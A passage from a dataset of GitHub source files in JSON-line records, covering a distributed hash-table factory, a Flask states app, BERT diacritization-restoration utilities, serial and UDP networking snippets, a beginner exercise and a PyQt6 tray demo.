multi_type_hash_table.MultiTypeHashTable(slot_to_config_on_ps,\n factory)\n\n return distributed_ps.DistributedMultiTypeHashTable(\n num_ps,\n merged_slot_to_config,\n multi_type_factory,\n max_rpc_deadline_millis=max_rpc_deadline_millis)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, distributed_multi_type_factory)\n\n\ndef create_native_multi_hash_table(\n num_ps: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filters: List[tf.Tensor],\n sync_clients: List[tf.Tensor] = None,\n max_rpc_deadline_millis: int = 30,\n):\n \"\"\"Create a distributed native multi hash table.\"\"\"\n if num_ps and sync_clients:\n assert num_ps == len(\n sync_clients\n ), \"Number of PS should be equal to number of sync clients, while got {} vs {}\".format(\n num_ps, len(sync_clients))\n if not sync_clients:\n sync_clients = [None] * max(num_ps, 1)\n\n if num_ps == 0:\n return multi_hash_table_ops.MultiHashTable.from_configs(\n configs=slot_to_config,\n hash_filter=hash_filters[0],\n sync_client=sync_clients[0])\n else:\n # The logic here is\n # slots -> distributed multi hash table -> multi hash table\n # | worker | ps |\n return distributed_ps.DistributedMultiTypeHashTable(\n num_ps,\n slot_to_config,\n MultiHashTableFactory(hash_filters, sync_clients),\n max_rpc_deadline_millis=max_rpc_deadline_millis)\n\n\ndef create_in_worker_native_multi_hash_table(\n shard_num: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filter: tf.Tensor,\n sync_client: tf.Tensor = None,\n queue_configs: Dict[str, int] = None,\n):\n # The logic here is\n # DistributedMultiTypeHashTableMpi -> alltoall -> multi_hash_table\n def table_factory(idx):\n return multi_hash_table_ops.MultiHashTable.from_configs(\n configs=slot_to_config,\n hash_filter=hash_filter,\n sync_client=sync_client,\n name_suffix=str(idx))\n\n return distributed_ps_sync.DistributedMultiTypeHashTableMpi(\n shard_num, table_factory, queue_configs)\n\n\ndef create_partitioned_hash_table(\n num_ps: int,\n use_native_multi_hash_table: bool,\n max_rpc_deadline_millis: int = 30,\n hash_filters: List[tf.Tensor] = None,\n sync_clients: List[tf.Tensor] = None,\n enable_gpu_emb: bool = False,\n queue_configs: Dict[str, int] = None,\n) -> distributed_ps.PartitionedHashTable:\n num_ps_tmp = num_ps if num_ps > 0 else 1\n if hash_filters is None:\n hash_filters = [None] * num_ps_tmp\n if 
sync_clients is None:\n sync_clients = [None] * num_ps_tmp\n\n if use_native_multi_hash_table:\n # assert enable_gpu_emb == False, \"gpu_emb not imple native_multi_hash_table\"\n multi_type_factory = MultiHashTableFactory(hash_filters, sync_clients)\n else:\n\n def multi_type_factory(idx: int, slot_to_config_on_ps):\n\n def factory(name_suffix, config):\n name_suffix = name_suffix if num_ps == 0 else \"_\".join(\n [name_suffix, str(idx)])\n return hash_table_ops.hash_table_from_config(\n config,\n hash_filter=hash_filters[idx],\n name_suffix=name_suffix,\n sync_client=sync_clients[idx])\n\n return multi_type_hash_table.MultiTypeHashTable(slot_to_config_on_ps,\n factory)\n\n return distributed_ps.PartitionedHashTable(num_ps,\n multi_type_factory,\n use_native_multi_hash_table,\n max_rpc_deadline_millis,\n queue_configs=queue_configs)\n","repo_name":"bytedance/monolith","sub_path":"monolith/native_training/distributed_ps_factory.py","file_name":"distributed_ps_factory.py","file_ext":"py","file_size_in_byte":9166,"program_lang":"python","lang":"en","doc_type":"code","stars":702,"dataset":"github-code","pt":"71"}
+{"seq_id":"7867552591","text":"# Find the most commonly occurring word in a page and replace it with it's synonym\n#\"The old man was was very old.\" \n#\"The senior man was was very senior\"\n#the : 1\n#old : 2\n#man : 1\n#was : 2\n\n#edge cases \n#1. empty string returns an empty string\n# 2. If there's a tie, replace the first word with the largest count\n\n#Pseudocode:\n# 1. Converting the string to an array [\"The\", \"old\",....]\n#2.dict with a counter for very single element in our array and poulating it by looping through the array\n#3.Find the maximum key\n#4. Loop through array to find the word that matches the maximum key and assign it a new synonym\nfrom collections import Counter\ndef mostOccuringWord(page, synonym):\n if len(page) == 0:\n return \"\"\n page = list(page.split(' ')) #split string into array \n Word = Counter(page) #creates a counter for each word\n maxKey = max(Word, key = Word.get) #get key with maximum value\n for idx, word in enumerate(page): \n #enumerate goes through an index and an element at once, special python function\n if word == maxKey:\n page[idx] = synonym \n return ' '.join(page) #return a joined string\nprint(mostOccuringWord(\"The old man was was was very old .\", synonym = \"senior\")) \nprint(mostOccuringWord(\"The old man was was very old .\", synonym = \"senior\"))\nprint(mostOccuringWord(\"\", synonym = \"cool\"))\n#Notice the difference in these last 2 print statements bc of the \".\"\nprint(mostOccuringWord( \"geeks for geeks is for geeks . By geeks and for the geeks .\", synonym = \"nerd\"))\nprint(mostOccuringWord( \"geeks for geeks is for geeks. By geeks and for the geeks.\", synonym = \"nerd\"))\n\n#Time complexity 0(n)\n#Space complexity 0(n)\n \n \n \n \n ","repo_name":"Ivy8127/Leetcode-Practise","sub_path":"Mock/mock4.py","file_name":"mock4.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"39750126613","text":"#!/usr/bin/python3\n\"\"\"\nScript that starts a Flask web application\n/states: display a HTML page: (inside the tag BODY)\n/states/: display a HTML page: (inside the tag BODY)\n\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage, State\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n@app.teardown_appcontext\ndef close_context(exception):\n storage.close()\n\n\n@app.route('/states')\n@app.route('/states/')\ndef states_cities_route(id=None):\n # route that fetches all states or a certain state\n states = storage.all(State)\n all_states = []\n\n if id is None:\n for state in states.values():\n all_states.append([state.id, state.name])\n return render_template('9-states.html', states=all_states, id=id)\n else:\n state_list = list(filter(lambda x: x.id == id, states.values()))\n state = None if len(state_list) == 0 else state_list[0]\n city_data = None\n if state:\n cities = state.cities\n cities_list = list(\n filter(lambda x: x.state_id == state.id, cities))\n city_data = list(map(lambda x: [x.id, x.name], cities_list))\n return render_template('9-states.html', state=state, cities=city_data, id=id)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"ErmiasBahru/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"4693850236","text":"import logging\nimport os\nimport pickle\nimport sys\nimport unicodedata\nfrom enum import Enum\nfrom typing import List, Optional, Tuple\n\nimport numpy as np\nimport torch\nfrom dataclasses import dataclass\nfrom filelock import FileLock\nfrom torch import nn\nfrom torch.utils.data.dataset import Dataset\n\nimport diacritization_stripping_data\nfrom transformers import PreTrainedTokenizer\n\nnp.random.seed(42)\n\n\ndef strip_diacritics(text):\n d_map = diacritization_stripping_data.strip_diacritization_uninames\n output = \"\"\n for c in text:\n if c in d_map:\n output += d_map[c]\n else:\n output += c\n\n return output\n\n\nlogger = logging.getLogger(__name__)\n\n@dataclass\nclass InputFeatures:\n \"\"\"\n A single set of features of data.\n Property names are the same names as the corresponding inputs to a model.\n \"\"\"\n\n input_ids: List[int]\n attention_mask: List[int]\n token_type_ids: Optional[List[int]] = None\n label_ids: Optional[List[int]] = None\n\n\n@dataclass\nclass PredictInputFeatures:\n \"\"\"\n A single set of features of data.\n Property names are the same names as the corresponding inputs to a model.\n \"\"\"\n\n input_ids: List[int]\n attention_mask: List[int]\n token_type_ids: Optional[List[int]] = None\n\n\nclass Split(Enum):\n train = \"train\"\n dev = \"dev\"\n test = \"test\"\n\n\nclass DiacritizationDataset(Dataset):\n features: List[InputFeatures]\n pad_token_label_id: int = nn.CrossEntropyLoss().ignore_index\n\n # Use cross entropy ignore_index as padding label id so that only\n # real label ids contribute to the loss later.\n\n def __init__(\n self,\n data_dir: str,\n input_train_file: str,\n target_train_file: str,\n input_dev_file: str,\n target_dev_file: str,\n input_test_file: str,\n target_test_file: str,\n tokenizer: PreTrainedTokenizer,\n labels: List[str],\n model_type: str,\n max_seq_length: Optional[int] = None,\n overwrite_cache=False,\n mode: Split = Split.train,\n ):\n '''\n\n :param lang: either concrete language (e.g. 
cs) or 'all' that means include all languages\n :param tokenizer:\n :param labels:\n :param model_type:\n :param max_seq_length:\n :param overwrite_cache:\n :param mode:\n '''\n\n self.label_map = {label: i for i, label in enumerate(labels)}\n self.model_type = model_type\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n\n # Load data features from cache or dataset file\n cached_examples_file = os.path.join(\n data_dir, \"cached_{}_{}_{}\".format(mode.value, tokenizer.__class__.__name__, str(max_seq_length)),\n )\n\n # Make sure only the first process in distributed training processes the dataset,\n # and the others will use the cache.\n lock_path = cached_examples_file + \".lock\"\n with FileLock(lock_path):\n\n if os.path.exists(cached_examples_file) and not overwrite_cache:\n logger.info(f\"Loading examples from cached file {cached_examples_file}\")\n with open(cached_examples_file, 'rb') as f:\n self.examples = pickle.load(f)\n else:\n logger.info(f\"Creating examples from dataset file at {data_dir}\")\n\n if isinstance(mode, Split):\n mode = mode.value\n\n logger.info(f\"Processing {mode} data\")\n\n if mode == 'test':\n self.examples = read_examples_from_disk(input_test_file, target_test_file)\n elif mode == 'dev':\n self.examples = read_examples_from_disk(input_dev_file, target_dev_file)\n elif mode == 'train':\n self.examples = read_examples_from_disk(input_train_file, target_train_file)\n\n logger.info(f\"Saving features into cached file {cached_examples_file}\")\n\n with open(cached_examples_file, 'wb') as f:\n pickle.dump(self.examples, f)\n\n # torch.save(self.examples, cached_examples_file)\n self.random_examples_permutation = np.arange(len(self.examples))\n np.random.shuffle(self.random_examples_permutation)\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i) -> InputFeatures:\n # start_time = time.time()\n while True:\n try:\n example = self.examples[self.random_examples_permutation[i]]\n\n features = convert_example_to_features(\n example,\n self.label_map,\n self.max_seq_length,\n self.tokenizer,\n cls_token_at_end=bool(self.model_type in [\"xlnet\"]),\n # xlnet has a cls token at the end\n cls_token=self.tokenizer.cls_token,\n cls_token_segment_id=2 if self.model_type in [\"xlnet\"] else 0,\n sep_token=self.tokenizer.sep_token,\n sep_token_extra=False,\n # roberta uses an extra separator b/w pairs of sentences, cf. github.com/pytorch/fairseq/commit/1684e166e3da03f5b600dbb7855cb98ddfcd0805\n pad_on_left=bool(self.tokenizer.padding_side == \"left\"),\n pad_token=self.tokenizer.pad_token_id,\n pad_token_segment_id=self.tokenizer.pad_token_type_id,\n pad_token_label_id=self.pad_token_label_id,\n replace_with_copy_instruction=True,\n use_instructions_as_labels=True\n )\n\n break\n\n # logging.info(\"time per item: {}\".format(time.time() - start_time))\n except Exception as e:\n raise e\n # print(\"Trying another example i+1\")\n # i += 1\n\n return features\n\n\nclass FileIteratorDataset(Dataset):\n features: List[InputFeatures]\n pad_token_label_id: int = nn.CrossEntropyLoss().ignore_index\n\n # Use cross entropy ignore_index as padding label id so that only\n # real label ids contribute to the loss later.\n\n def __init__(\n self,\n file: str,\n tokenizer: PreTrainedTokenizer,\n model_type: str,\n labels\n ):\n '''\n\n :param lang: either concrete language (e.g. 
cs) or 'all' that means include all languages\n :param data_dir:\n :param tokenizer:\n :param labels:\n :param model_type:\n :param max_seq_length:\n :param overwrite_cache:\n :param mode:\n '''\n\n self.model_type = model_type\n self.tokenizer = tokenizer\n self.label_map = {label: i for i, label in enumerate(labels)}\n\n self.examples = []\n\n with open(file, encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n self.examples.append(line)\n\n def __len__(self):\n return len(self.examples)\n\n\n def __getitem__(self, i):\n # start_time = time.time()\n example = self.examples[i]\n\n ## START PARAMS\n cls_token_at_end = bool(self.model_type in [\"xlnet\"])\n cls_token = self.tokenizer.cls_token\n cls_token_segment_id = 2 if self.model_type in [\"xlnet\"] else 0\n sep_token = self.tokenizer.sep_token\n sep_token_extra = False\n # roberta uses an extra separator b/w pairs of sentences, cf. github.com/pytorch/fairseq/commit/1684e166e3da03f5b600dbb7855cb98ddfcd0805\n pad_on_left = bool(self.tokenizer.padding_side == \"left\")\n pad_token = self.tokenizer.pad_token_id\n pad_token_segment_id = self.tokenizer.pad_token_type_id\n pad_token_label_id = self.pad_token_label_id\n sequence_a_segment_id = 0\n mask_padding_with_zero = True\n ## END PARAMS\n\n tokens = self.tokenizer.tokenize(example)\n unk_token = self.tokenizer.unk_token\n all_special_tokens_extended = self.tokenizer.all_special_tokens_extended\n\n # TODO remove this once training is corrected\n nohashes = []\n for token in tokens:\n if token in all_special_tokens_extended and token != unk_token:\n continue\n\n nohashes.append(token)\n\n tokens = nohashes\n\n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n tokens += [sep_token]\n if sep_token_extra:\n # roberta uses an extra separator b/w pairs of sentences\n tokens += [sep_token]\n segment_ids = [sequence_a_segment_id] * len(tokens)\n\n if cls_token_at_end:\n tokens += [cls_token]\n segment_ids += [cls_token_segment_id]\n else:\n tokens = [cls_token] + tokens\n segment_ids = [cls_token_segment_id] + segment_ids\n\n input_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n # The mask has 1 for real tokens and 0 for padding tokens. 
Only real\n # tokens are attended to.\n input_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n if \"token_type_ids\" not in self.tokenizer.model_input_names:\n segment_ids = None\n\n # logging.info(\"time per item: {}\".format(time.time() - start_time))\n return {\"input_ids\": torch.Tensor([input_ids]).long(),\n \"attention_mask\": torch.Tensor([input_mask]).long(),\n \"token_type_ids\": torch.Tensor([segment_ids]).long()}\n\n\ndef read_examples_from_disk(\n input_file: str,\n target_file: str,\n sentences_per_dataset=sys.maxsize\n) -> List[Tuple[str, str]]:\n # start code\n\n guid_index = 1\n examples = []\n\n with open(input_file, encoding='utf-8') as inp_f, open(target_file,\n encoding='utf-8') as tar_f:\n for line_index, (input_line, target_line) in enumerate(zip(inp_f, tar_f)):\n if line_index > sentences_per_dataset:\n break\n\n input_line, target_line = input_line.strip('\\n'), target_line.strip('\\n')\n if not input_line:\n continue\n\n # examples.append(InputExample(nodia=input_line, dia=target_line))\n examples.append(target_line)\n guid_index += 1\n\n return examples\n\n\ndef convert_example_to_features(\n example: Tuple[str, str],\n label_map,\n max_seq_length: int,\n tokenizer: PreTrainedTokenizer,\n cls_token_at_end=False,\n cls_token=\"[CLS]\",\n cls_token_segment_id=1,\n sep_token=\"[SEP]\",\n sep_token_extra=False,\n pad_on_left=False,\n pad_token=0,\n pad_token_segment_id=0,\n pad_token_label_id=-100,\n sequence_a_segment_id=0,\n mask_padding_with_zero=True,\n replace_with_copy_instruction=True,\n use_instructions_as_labels=True\n) -> InputFeatures:\n \"\"\" Loads a data file into a list of `InputFeatures`\n `cls_token_at_end` define the location of the CLS token:\n - False (Default, BERT/XLM pattern): [CLS] + A + [SEP] + B + [SEP]\n - True (XLNet/GPT pattern): A + [SEP] + B + [SEP] + [CLS]\n `cls_token_segment_id` define the segment id associated to the CLS token (0 for BERT, 2 for XLNet)\n \"\"\"\n target_line = example\n input_line = strip_diacritics(target_line)\n\n aligned_tokens = get_aligned_tokens(input_line, target_line, tokenizer)\n tokens_dia_ids = [] # labels\n\n tokens_nodia = []\n for aligned_token in aligned_tokens:\n nodia_token, dia_token = aligned_token\n tokens_nodia.append(nodia_token)\n\n if not use_instructions_as_labels:\n if replace_with_copy_instruction and dia_token == nodia_token:\n tokens_dia_ids.append(label_map[\"\"])\n elif nodia_token == tokenizer.unk_token:\n if replace_with_copy_instruction:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n tokens_dia_ids.append(label_map[\"\"])\n elif dia_token not in label_map:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n tokens_dia_ids.append(label_map[dia_token])\n else:\n if dia_token == nodia_token:\n tokens_dia_ids.append(label_map[\"\"])\n elif nodia_token == tokenizer.unk_token:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n dia_token_instructions = _text_to_dia_instructions(dia_token)\n if dia_token_instructions not in label_map:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n tokens_dia_ids.append(label_map[dia_token_instructions])\n\n # Account for [CLS] and [SEP] with \"- 2\" and with \"- 3\" for RoBERTa.\n special_tokens_count = tokenizer.num_special_tokens_to_add()\n if len(tokens_nodia) > max_seq_length - special_tokens_count:\n tokens_nodia = tokens_nodia[: (max_seq_length - special_tokens_count)]\n tokens_dia_ids = tokens_dia_ids[: (max_seq_length - special_tokens_count)]\n\n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this 
jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n tokens_nodia += [sep_token]\n tokens_dia_ids += [pad_token_label_id]\n if sep_token_extra:\n # roberta uses an extra separator b/w pairs of sentences\n tokens_nodia += [sep_token]\n tokens_dia_ids += [pad_token_label_id]\n segment_ids = [sequence_a_segment_id] * len(tokens_nodia)\n\n if cls_token_at_end:\n tokens_nodia += [cls_token]\n tokens_dia_ids += [pad_token_label_id]\n segment_ids += [cls_token_segment_id]\n else:\n tokens_nodia = [cls_token] + tokens_nodia\n tokens_dia_ids = [pad_token_label_id] + tokens_dia_ids\n segment_ids = [cls_token_segment_id] + segment_ids\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens_nodia)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding_length = max_seq_length - len(input_ids)\n if pad_on_left:\n input_ids = ([pad_token] * padding_length) + input_ids\n input_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + input_mask\n segment_ids = ([pad_token_segment_id] * padding_length) + segment_ids\n tokens_dia_ids = ([pad_token_label_id] * padding_length) + tokens_dia_ids\n else:\n input_ids += [pad_token] * padding_length\n input_mask += [0 if mask_padding_with_zero else 1] * padding_length\n segment_ids += [pad_token_segment_id] * padding_length\n tokens_dia_ids += [pad_token_label_id] * padding_length\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n assert len(tokens_dia_ids) == max_seq_length\n\n # if ex_index < 5:\n # logger.info(\"*** Example ***\")\n # # logger.info(\"guid: %s\", example.guid)\n # logger.info(\"tokens: %s\", \" \".join([str(x) for x in tokens_nodia]))\n # logger.info(\"input_ids: %s\", \" \".join([str(x) for x in input_ids]))\n # logger.info(\"input_mask: %s\", \" \".join([str(x) for x in input_mask]))\n # logger.info(\"segment_ids: %s\", \" \".join([str(x) for x in segment_ids]))\n # logger.info(\"label_ids: %s\", \" \".join([str(x) for x in tokens_dia_ids]))\n\n if \"token_type_ids\" not in tokenizer.model_input_names:\n segment_ids = None\n\n return InputFeatures(input_ids=input_ids, attention_mask=input_mask, token_type_ids=segment_ids,\n label_ids=tokens_dia_ids)\n\n\ndef get_aligned_tokens(input_line, target_line, tokenizer):\n unk_token = tokenizer.unk_token\n\n if not tokenizer.is_fast:\n raise ValueError(\"Do use fast tokenizer!\")\n\n else:\n tokens_nodia_alignment = get_token_source_mapping(input_line, tokenizer)\n tokens_nodia = []\n tokens_dia = []\n\n for cur_tok, cur_tok_start, cur_tok_end in tokens_nodia_alignment:\n 
tokens_nodia.append(cur_tok)\n tokens_dia.append(target_line[cur_tok_start:cur_tok_end])\n\n aligned_tokens = []\n for token_nodia, token_dia in zip(tokens_nodia, tokens_dia):\n if token_nodia.startswith('##') and not token_dia.startswith('##'):\n token_dia = '##' + token_dia\n\n if token_nodia.startswith('▁') and not token_dia.startswith('▁'):\n token_dia = '▁' + token_dia\n\n if len(token_nodia) == len(token_dia):\n aligned_tokens.append([token_nodia, token_dia])\n\n return aligned_tokens\n\n\ndef normalize_text_from_tokenizer(text: str):\n # when constructing instruction for ##mne -> ##mně, ignore ## so that instruction is the same as for mne -> mně (less instructions)\n if text.startswith(\"##\"):\n text = text[2:]\n\n if text.startswith('▁'):\n text = text[1:]\n\n return text\n\n\ndef dia_instructions_to_text(text: str, dia_instructions):\n if dia_instructions == '' or dia_instructions == '':\n return text\n\n text = normalize_text_from_tokenizer(text)\n\n text = list(text)\n instructions = dia_instructions.split(';')\n for instruction in instructions:\n c_index, c_name_after_first_with = instruction.split(':')\n c_index = int(c_index)\n\n if c_index < len(text):\n c_name = unicodedata.name(text[c_index]) + \" WITH \" + c_name_after_first_with\n try:\n c_name = unicodedata.lookup(c_name)\n text[c_index] = c_name\n except KeyError:\n logging.info(f'{c_name} not found')\n else:\n logging.info(f'Skipping, because attempted {dia_instructions} on {text}, specifically {instruction}')\n\n return \"\".join(text)\n\n\ndef _text_to_dia_instructions(text: str):\n text = normalize_text_from_tokenizer(text)\n\n converted_label = []\n for c_index, c in enumerate(text):\n if strip_diacritics(c) != c:\n c_name = unicodedata.name(c)\n if 'WITH' in c_name:\n first_index_of_with = c_name.index(\"WITH\")\n c_name_after_first_with = c_name[first_index_of_with + 4 + 1:]\n converted_label.append(f\"{c_index}:{c_name_after_first_with}\")\n\n if converted_label:\n return \";\".join(converted_label)\n else:\n return \"\"\n\n\ndef get_token_source_mapping(input_line, tokenizer):\n unk_token = tokenizer.unk_token\n\n if not tokenizer.is_fast:\n raise ValueError('Not supported, must use Fast tokenizer!')\n else:\n input_line_encoded = tokenizer(input_line)\n input_line_tokens = tokenizer.convert_ids_to_tokens(input_line_encoded['input_ids'])\n input_line_tokens_special_out = []\n for input_line_token in input_line_tokens:\n # skip all special tokens (e.g. 
[CLS], [PAD]) - these are added later, but not unknown token\n if input_line_token in tokenizer.all_special_tokens_extended and input_line_token != unk_token:\n continue\n\n input_line_tokens_special_out.append(input_line_token)\n input_line_tokens = input_line_tokens_special_out\n\n input_line_char_to_token_indices = [input_line_encoded.char_to_token(i) for i in range(len(input_line))]\n aligned_tokens = [[x, None, None] for x in input_line_tokens]\n for i in range(len(input_line)):\n cur_char_word_ind = input_line_char_to_token_indices[i]\n\n if cur_char_word_ind is None:\n continue\n\n cur_char_word_ind = cur_char_word_ind - 1 # char_to_token indexes from 1\n if aligned_tokens[cur_char_word_ind][1] is None:\n aligned_tokens[cur_char_word_ind][1] = i\n\n aligned_tokens[cur_char_word_ind][2] = i + 1\n\n for i in range(len(aligned_tokens)):\n if i > 0 and aligned_tokens[i][1] is None:\n aligned_tokens[i][1] = aligned_tokens[i - 1][1]\n aligned_tokens[i][2] = aligned_tokens[i - 1][2]\n\n if len(aligned_tokens) != len(input_line_tokens):\n print(input_line)\n print(aligned_tokens)\n print(input_line_tokens)\n raise ValueError()\n return aligned_tokens\n\n\ndef get_labels(path: str) -> List[str]:\n # now only instructions are supported\n labels = dict()\n with open(path, \"r\", encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n dia_token, count = line.split('\\t')\n if len(dia_token) > 2 and (dia_token[0] == dia_token[-1] == \"\\\"\" or dia_token[0] == dia_token[-1] == \"'\"):\n dia_token = dia_token[1:-1]\n\n if strip_diacritics(dia_token) != dia_token:\n converted_label = _text_to_dia_instructions(dia_token)\n\n if converted_label not in labels:\n labels[converted_label] = 0\n\n labels[converted_label] += int(count)\n else:\n if '' not in labels:\n labels[''] = 0\n labels[''] += int(count)\n\n print(f'Original instruction count {len(labels)}')\n # filter out labels that occured only once (CommonCrawl outliers)\n filtered_labels = []\n for label, label_count in labels.items():\n if label_count >= 2:\n filtered_labels.append(label)\n\n print('Filtering out instructions that occurred only once....')\n print(\n f'New instruction set size: {len(filtered_labels)}. That is, we filtered out {len(labels) - len(filtered_labels)}')\n # append UNK\n labels = [\"\", \"\"] + filtered_labels\n return labels\n","repo_name":"ufal/bert-diacritics-restoration","sub_path":"utils_diacritization.py","file_name":"utils_diacritization.py","file_ext":"py","file_size_in_byte":23820,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
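The record above encodes each diacritic as an index:SUFFIX instruction, where SUFFIX is the tail of the Unicode character name after "WITH", so applying an instruction is a plain unicodedata name lookup. A minimal self-contained sketch of that mechanism (the helper name is ours; the example mirrors the mne -> mně case mentioned in the record's comments):

import unicodedata

def add_diacritic(text, index, suffix):
    # e.g. name('e') = 'LATIN SMALL LETTER E'; appending ' WITH CARON' looks up 'ě'
    chars = list(text)
    chars[index] = unicodedata.lookup(unicodedata.name(chars[index]) + " WITH " + suffix)
    return "".join(chars)

print(add_diacritic("mne", 2, "CARON"))  # -> 'mně'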
+{"seq_id":"22757719406","text":"import time\nimport serial\n\nser = serial.Serial(\n port='/dev/ttyS0', #Replace ttyS0 with ttyAM0 for Pi1,Pi2,Pi0\n baudrate = 115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\ncounter=0\n\nwhile 1: \n\t# Convert the Unicode string to bytes\n\tmessage = f'Write counter: {counter} \\n'\n\tencoded_message = message.encode()\n\tser.write(encoded_message)\n\ttime.sleep(1) \n\tcounter += 1\n","repo_name":"2IIZ/Python","sub_path":"12_raspberrypi_gpio/Serial communication/ch340-sender.py","file_name":"ch340-sender.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29042987803","text":"from socket import socket, AF_INET, SOCK_DGRAM\n\nHOST = '0.0.0.0'\nPORT = 12322\n\ns = socket(AF_INET, SOCK_DGRAM)\ns.bind((HOST, PORT))\n\nbuffers = {}\n\nwhile True:\n data, (address, port) = s.recvfrom(8192)\n data = data.decode('utf-8')\n if not address in buffers:\n buffers[address] = \"\"\n buffers[address] += data\n lines = buffers[address].split('\\n')\n buffers[address] = lines.pop()\n for line in lines:\n print(\"[{}] {}\".format(address, line))\n\ns.close()\n","repo_name":"Whatever-Co/zorozoro-experiments","sub_path":"04-esp32/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"27549965167","text":"\ndef firstfunction(filename):\n with open('Data Files/' + filename, 'r') as f:\n data = f.readlines()\n return data\n '''if numbers == False:\n return data\n\n \n intdata = []\n for line in data:\n intdata.append(int(line))\n return intdata\n\n\ndef buildings():\n buildingsData = firstfunction('buildings10.txt', True)\n print(max(buildingsData))'''\n\ndef longword():\n words = firstfunction('manyWords.txt')\n newWords = []\n for word in words:\n newWords.append(word.strip())\n print(newWords)\n leng = 0\n for word in words:\n if len(word) > leng:\n leng = len(word)\n big = word\n print(big)\n\nif __name__ == \"__main__\":\n #print(firstfunction('sample.txt', True))\n #buildings()\n longword()\n\n","repo_name":"ethanglaser/Python-Tutoring","sub_path":"Code from lessons/lesson12.py","file_name":"lesson12.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38369040261","text":"import PyQt6.QtGui\nimport PyQt6.QtWidgets\nimport functools\nimport sys\n\napp = PyQt6.QtWidgets.QApplication([])\napp.setQuitOnLastWindowClosed(False)\n\n# Create the icon\nicon = PyQt6.QtGui.QIcon(\"./dist/giftray/icons/red/windows_MuteUnmute2.ico\")\nprint(icon.availableSizes ()==[])\nicon = PyQt6.QtGui.QIcon(sys.executable)\nprint(icon.availableSizes ()==[])\n\ndef act(s):\n print(s)\n return\n\n# Create the tray\ntray = PyQt6.QtWidgets.QSystemTrayIcon()\ntray.setIcon(icon)\ntray.setToolTip(\"System Tray Management\")\ntray.setVisible(True)\n\n# Create the menu\nmenu = PyQt6.QtWidgets.QMenu()\naction = PyQt6.QtGui.QAction(\"A menu item\")\nmenu.addAction(action)\n\naction2 = PyQt6.QtGui.QAction(PyQt6.QtGui.QIcon(\"./dist/giftray/icons/red/windows_MuteUnmute.ico\"), \"With image menu\")\n#action2.setObjectName('action to print')\naction2.triggered.connect(functools.partial(act, 'action to print'))\nmenu.addAction(action2)\n\nmenu.addSeparator()\n# Add a Quit option to the menu.\nquit = PyQt6.QtGui.QAction(\"Quit\")\nquit.triggered.connect(app.quit)\nmenu.addAction(quit)\n\n# Add the menu to the tray\ntray.setContextMenu(menu)\n\nclass Window(PyQt6.QtWidgets.QWidget):\n def __init__(self):\n super(Window, self).__init__()\n\n icons = sorted([attr for attr in dir(PyQt6.QtWidgets.QStyle.StandardPixmap) if attr.startswith(\"SP_\")])\n layout = PyQt6.QtWidgets.QGridLayout()\n\n for n, name in 